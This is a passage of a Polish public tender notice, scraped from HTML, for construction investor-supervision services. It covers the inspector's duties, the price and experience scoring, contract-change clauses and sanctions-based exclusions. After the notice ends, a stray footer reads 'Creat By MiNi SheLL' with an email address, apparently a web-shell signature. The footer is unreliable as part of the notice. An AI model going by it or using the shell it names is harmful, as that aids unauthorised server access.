elektryczne (instalacje oświetlenia podstawowego, awaryjnego i ewakuacyjnego, instalacje gniazd wtykowych i wpustów zasilających, instalacja uziemiająco-wyrównawcza, instalacja odgromowa, instalacja fotowoltaiczna, instalacja systemu włamania i napadu, instalacja systemu monitoringu CCTV, instalacja nagłośniueniowa) <br/>budowa przyłączy wod – kan i energetycznego,<br/>wyposażenie budynku <br/>zagospodarowanie terenu wraz z dostawą i montażem elementów małej architektury.<br/>- niwelacja terenu,<br/>- nawierzchnie,<br/>- oznakowanie,<br/>- budowa placu zabaw wraz z urządzeniami,<br/>- montaż elementów małej architektury,<br/>- ogrodzenie terenu,<br/>- zieleń.<br/>3.	Zamówienie obejmuje pełnienie funkcji inspektora nadzoru branży budowlano-konstrukcyjnej, sanitarnej i elektrycznej.<br/>4.	Inspektor nadzoru inwestorskiego pełnić będzie funkcję inspektora nadzoru inwestorskiego w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2024 r. poz. 725 ze zm.).<br/>5.	Inspektor nadzoru inwestorskiego będzie wykonywać zlecony nadzór zgodnie z wymaganiami Zamawiającego, dokumentacją projektową, obowiązującymi przepisami i zasadami wiedzy technicznej.<br/>6.	Inspektor nadzoru inwestorskiego realizując zadanie będzie zobowiązany do:<br/>1)	Wyznaczenia inspektora koordynatora, który będzie koordynował pełnienie nadzoru inwestorskiego przez koordynatorów wszystkich branż,<br/>2)	reprezentowania Zamawiającego – Inwestora na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją projektową, w szczególności z projektami budowlanymi, specyfikacjami technicznymi wykonania i odbioru robót, decyzjami, przepisami prawa, w zakresie BHP, normami, zasadami wiedzy technicznej oraz zapisami umowy o roboty budowlane z Wykonawcą Inwestycji;<br/>3)	kontroli prawidłowości zafakturowania wykonanych robót, potwierdzenia faktycznie wykonanych robót oraz usunięcia wad także na żądanie Zamawiającego, kontrolowania rozliczeń budowy;<br/>4)	zatwierdzania materiałów, technologii budowlanych oraz jakości wykonania zgodnie z warunkami umowy zawartej z wykonawcą robót i dokumentacją projektową, w tym również z projektami budowlanymi, projektami budowlanymi wykonawczymi, specyfikacjami technicznymi wykonania i odbioru robót, dla wszystkich robót,<br/>5)	organizowania roboczych narad koordynacyjnych w sprawie prowadzonych robót <br/>z udziałem Zamawiającego i wszystkich niezbędnych stron oraz sporządzania protokołów z tych narad,<br/>6)	opiniowania wniosków wykonawcy robót w sprawie zmiany sposobu wykonania robót budowlanych, w tym zmiany materiałów, urządzeń i technologii,<br/>7)	w razie zaistnienia robót dodatkowych niezwłocznego zgłoszenia na piśmie konieczności wykonania tych robót wraz z uzasadnieniem, a po uzyskaniu akceptacji Zamawiającego, dokonanie uzgodnień z autorem projektu w zakresie wykonania dokumentacji zamiennej lub niezbędnej dokumentacji na roboty dodatkowe,<br/>8)	niezwłocznego informowania Zamawiającego o konieczności wykonania robót odbiegających od założeń w terminie 3 dni od daty stwierdzenia konieczności ich wykonania,<br/>9)	rozstrzygania w porozumieniu z kierownikiem budowy i przedstawicielem Zamawiającego wątpliwości natury technicznej powstałych w trakcie realizacji zamówienia;<br/>10)	potwierdzania faktycznie wykonanych robót oraz usunięcia wad;<br/>11)	dokonywania odbiorów częściowych robót zanikających i ulegających zakryciu;<br/>12)	sprawdzania i zatwierdzanie operatu kolaudacyjnego przed odbiorem końcowym;<br/>13)	uczestnictwa w odbiorze końcowym inwestycji i przyjmowania od wykonawców wszelkich dokumentów wymaganych w terminie odbioru (w tym sprawdzenia kompletności dokumentów, atestów, aprobat technicznych, protokołów pomiarów, DTR, geodezyjnej inwentaryzacji powykonawczej obiektów i ich części, dziennika budowy oraz innych), niezbędnych do odbioru końcowego całego zadania;<br/>14) wydawania kierownikowi budowy lub kierownikom robót poleceń, potwierdzonych wpisem do dziennika budowy, dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienie ekspertyz dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów budowlanych i urządzeń technicznych;<br/>15)	żądania od kierownika budowy lub kierowników robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z dokumentacją projektową lub pozwoleniem na budowę;<br/>16)	bieżącej kontroli ilości i terminowości wykonywanych robót;<br/>17)	podejmowania działań w celu dotrzymania terminu realizacji inwestycji;<br/>18)	po rozpoczęciu robót budowlanych nadzorowania budowy z taką częstotliwością oraz w takich godzinach, aby była zapewniona skuteczność nadzoru, a w sytuacjach wyjątkowych niezwłocznie, gdy obecność inspektora nadzoru będzie nieodzowna, najpóźniej w następnym dniu od powiadomienia, a w szczególności:<br/>a)	co najmniej jednej wizyty Inspektora nadzoru inwestorskiego w odpowiednich specjalnościach uprawnionego do nadzorowania robót na budynku w każdym tygodniu podczas realizacji robót danej branży, <br/>b)	niezależnie od wizyt określonych w pkt. 18) lit a) konieczna obecność podczas odbiorów częściowych i odbioru końcowego Inspektora Nadzoru inwestorskiego <br/>w specjalności odpowiedniej do zrealizowanych robót będących przedmiotem odbioru częściowego lub końcowego. <br/>c)	wizyty w nagłych sytuacjach na budowie - na wezwanie Zamawiającego <br/>lub Wykonawcy robót stawienie się w terminie nie dłuższym niż 1 dzień <br/>(24 godziny) od wezwania Zamawiającego, <br/>d)	wizyty w przypadku powstania katastrofy budowlanej w ciągu 2 godzin <br/>od wezwania Wykonawcy robót lub Zamawiającego;<br/>19)	kontrolowania prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót;<br/>20)	informowania na bieżąco Zamawiającego o przebiegu prac, o napotkanych problemach i podjętych działaniach zaradczych mających na celu ich przezwyciężenie (wczesne ostrzeganie, zwłaszcza w sprawach mogących wpłynąć na termin zakończenia robót);<br/>21)	prowadzenia dokumentacji fotograficznej inwestycji w szczególności robót ulegających zakryciu, wykonanych wadliwie lub z opóźnieniem i udostępnianie jej na każde żądanie Zamawiającego;<br/>22)	udziału w przekazaniu placu budowy;<br/>23)	uczestnictwa w okresie gwarancji i rękojmi przy przeglądach gwarancyjnych na zawiadomienie Zamawiającego, potwierdzenia usunięcia wad i usterek w okresie gwarancji i rękojmi bez dodatkowego wynagrodzenia;<br/>24)	wykonywania innych czynności, przewidzianych dla inspektora nadzoru w umowie z wykonawcą inwestycji;<br/>25)	wykonania czynności odnoszących się do realizacji uprawnień z tytułu rękojmi za wady wykonanych robót;<br/>26)	przyjęcia od kierownika budowy dokumentacji powykonawczej, dziennika budowy oraz po uprzednim ich sprawdzeniu przekazania ich Zamawiającemu,<br/>27)	przygotowania w porozumieniu z Wykonawcą robót zestawienia wybudowanej infrastruktury (długości, powierzchnie, szt., itp.).<br/>7.	Bez zgody Zamawiającego, Inspektor Nadzoru nie może wprowadzić żadnych zmian w zakresie realizacji umowy na wykonanie robót budowlanych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <p class="mb-0">71540000-5 - Usługi zarządzania budową</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi kryteriami oceny:<br/>A - Cena - 60%<br/>Maksymalna liczba punktów do uzyskania przy kryterium „Cena” wynosi 60.<br/>Liczba punktów przyznana ofercie w kryterium cena zostanie obliczona wg wzoru:<br/> <br/> cena najniższa<br/>A = -------------------------- x 100 x 60% <br/> cena oferty badanej<br/><br/>Wyniki będą zaokrąglane do 2 miejsc po przecinku (od 5 w górę).<br/>B – Doświadczenie Inspektora nadzoru branży konstrukcyjno - budowlanej – 40%<br/>Maksymalna liczba punktów do uzyskania przy kryterium „Doświadczenie Inspektora nadzoru branży konstrukcyjno - budowlanej” wynosi 40. <br/>Gdy Wykonawca wykaże, że Inspektora nadzoru branży konstrukcyjno - budowlanej wskazany w ofercie posiada doświadczenie jako Inspektor nadzoru branży konstrukcyjno - budowlanej na: <br/>	żadnym lub jednym zadaniu dot. robót konstrukcyjno - budowlanych- otrzyma 0 punktów <br/>	dwóch zadaniach dot. robót konstrukcyjno - budowlanych - otrzyma 20 punktów <br/>	trzech lub więcej zadaniach dot. robót konstrukcyjno - budowlanych - otrzyma 40 punktów.<br/>Ocena łączna X= A + B <br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie najwyższa liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Inspektora nadzoru branży konstrukcyjno - budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie, o którym mowa w art. 125 ust. 1 ustawy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Cd. Informacja o komunikacji<br/>14.	Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>15.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>16.	W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>17.	Zamawiający dopuszcza również komunikację za pomocą poczty elektronicznej na adres e-mail: um@brusy.pl (nie dotyczy składania ofert). <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 4.	Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1)	Oświadczenie o braku podstaw wykluczenia, którego propozycję stanowi Załącznik Nr 3 do SWZ,<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o braku podstaw wykluczenia, składa każdy z wykonawców oddzielnie.<br/>2)	pełnomocnictwo dla osoby podpisującej ofertę do występowania w imieniu wykonawcy, jeżeli nie wynika to bezpośrednio z dokumentów rejestrowych lub w przypadku o którym mowa w art. 58 ust. 2 ustawy Prawo zamówień publicznych (propozycja - Załącznik Nr 4 do SWZ).<br/>Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formie elektronicznej podpisanej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym).Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14.02.1991r. – Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 5.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. W przypadku wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia, oświadczenie, o którym mowa w ust. 4 pkt 2), składa każdy <br/>z wykonawców oddzielnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy <br/>w stosunku do treści oferty w przypadkach określonych w art. 455 ustawy Pzp oraz:<br/>1)	wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu realizacji przedmiotu umowy,<br/>2)	wystąpienia siły wyższej, tj. wystąpienia wyjątkowego wydarzenia lub okoliczności:<br/>	na którą Strony nie miały wpływu,<br/>	przeciw której Strony nie mogły się zabezpieczyć przed zawarciem umowy,<br/>	której nie można było w racjonalny sposób uniknąć lub przezwyciężyć,<br/>	której nie można uznać za wywołaną w znaczącym stopniu przez żadną ze Stron.<br/>3)	sądowej waloryzacji zamówienia,<br/>4)	zmiany osób reprezentujących Zamawiającego/Wykonawcę w przypadku zmian organizacyjnych lub wynikłych z przyczyn losowych,<br/>5)	wystąpienia konieczności wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń instytucji, która przyznała środki na sfinansowanie zamówienia lub/i umowy na roboty budowlane,<br/>6)	gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni wpływ na realizację przedmiotu umowy,<br/>7)	skrócenia lub wydłużenia terminu realizacji usługi w przypadku, gdy termin wykonywania nadzorowanych robót zostanie odpowiednio skrócony lub przedłużony,<br/>8)	zmiany wynagrodzenia:<br/>a)	zmiany maksymalnego wynagrodzenia za nadzór inwestorski w przypadku określonym w pkt. 7), z zastrzeżeniem że wynagrodzenie zostanie zmienione (zwiększone lub zmniejszone) o procent równy stosunkowi nowego terminu realizacji usługi do terminu umownego. Dopuszczalna jest zmiana wynagrodzenia w zakresie, w jakim zmiany te mają wpływ na wysokość wynagrodzenia Wykonawcy, z zastrzeżeniem, że zmiana wynagrodzenia nie przekroczy 15% wynagrodzenia umownego określonego w §4/ *do Części<br/>b)	jeśli zajdą okoliczności określone w art. 455 ustawy Pzp,<br/>c)	w przypadku zmiany kosztów związanych z realizacją umowy, przy zachowaniu następujących warunków:<br/>	każda ze Stron niniejszej umowy może żądać zmiany wynagrodzenia jeden raz <br/>w toku wykonywania umowy, nie wcześniej jednak niż po 31 maja 2025 r. ,<br/>	podstawą żądania, o którym mowa w tirecie pierwszym jest zmiana cen paliwa (benzyny/oleju napędowego) o 30% w stosunku do ceny paliwa (benzyny/oleju napędowego) na dzień składania ofert.<br/>	poprzez zmianę kosztów rozumie się wzrost odpowiednio kosztów, jak i ich obniżenie, względem kosztu przyjętego w celu ustalenia wynagrodzenia wykonawcy zawartego w ofercie,<br/>	strona żądająca zmiany wynagrodzenia w złożonym wniosku ma obowiązek wskazania zmian w kosztach mających wpływ na koszt wykonania zamówienia, <br/>a także proponowane nowe wynagrodzenie,<br/> w celu określenia wpływu zmiany kosztów na koszt wykonania zamówienia Wykonawca w terminie 14 dni od zawarcia umowy składa informację o cenie i rodzaju paliwa (benzyny/oleju napędowego) przyjętego do kalkulacji w złożonej ofercie oraz przedstawia metodologię uwzględnienia tego kosztu w cenie jednostkowej godziny pełnienia nadzoru inwestorskiego<br/> w żądaniu, o którym mowa w tiret pierwszym strona ma obowiązek wskazać <br/>w analogicznym jak ww. informacji zmieniany koszt oraz jego wpływ na cenę jednostkową godziny pełnienia nadzoru inwestorskiego oraz zakres ilościowy <br/>i wartościowy pozostały do wykonania po dniu złożenia żądania.<br/> zmiana wynagrodzenia może nastąpić do granicy wpływu zmian kosztów na pozostałe do wypłaty wynagrodzenie,<br/> zamawiający dopuszcza maksymalną zmianę wynagrodzenia Wykonawcy w efekcie zastosowania postanowień pkt c) nie wyższą niż 10 % ryczałtu za godzinę wynagrodzenia umownego brutto, o której mowa w §4 ust. 1 umowy.<br/>2.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną <br/>na piśmie w formie aneksu do umowy pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-02 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1) Wykonawca składa ofertę wraz z wymaganymi dokumentami za pośrednictwem Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl na formularzu ofertowym, zgodnym z wzorem stanowiącym Załącznik Nr 1 do SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-02 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-10-31</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 5.	Na podstawie art. 7 ust. 1 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach <br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego z postępowania o udzielenie zamówienia prowadzonego na podstawie ustawy Pzp wyklucza się:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych <br/>w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.<br/>6.	Wykluczenie, o którym mowa w ust. 5 następuje na okres trwania okoliczności, o których mowa w ust. 5.<br/>7.	W przypadku wykonawcy wykluczonego na podstawie art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, zamawiający odrzuca ofertę takiego wykonawcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com